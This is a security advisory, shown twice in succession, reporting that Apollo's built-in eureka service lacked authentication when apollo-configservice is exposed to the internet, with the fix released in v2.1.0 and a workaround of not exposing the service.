Impact
If users expose the apollo-configservice to the internet(which is not recommended), there are potential security issues since there is no authentication feature enabled for the built-in eureka service. Malicious hackers may access eureka directly to mock apollo-configservice and apollo-adminservice .
Patches
Login authentication for eureka was added in #4663 and was released in v2.1.0.
Workarounds
To fix the potential issue without upgrading, simply follow the advice that does not expose apollo-configservice to the internet.
References
Apollo Security Guidence
For more information
If you have any questions or comments about this advisory:
Impact
If users expose the apollo-configservice to the internet(which is not recommended), there are potential security issues since there is no authentication feature enabled for the built-in eureka service. Malicious hackers may access eureka directly to mock apollo-configservice and apollo-adminservice .
Patches
Login authentication for eureka was added in #4663 and was released in v2.1.0.
Workarounds
To fix the potential issue without upgrading, simply follow the advice that does not expose apollo-configservice to the internet.
References
Apollo Security Guidence
For more information
If you have any questions or comments about this advisory: